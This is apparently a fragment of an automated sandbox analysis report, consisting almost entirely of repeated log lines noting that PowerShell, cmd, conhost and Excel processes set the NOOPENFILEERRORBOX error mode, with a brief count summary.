Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (236 entries)
Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX  (3 entries)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE  Process information set: NOOPENFILEERRORBOX  (46 entries)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE  Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX  (1 entry)
Source: C:\Windows\SysWOW64\cmd.exe  Process information set: NOOPENFILEERRORBOX  (3 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
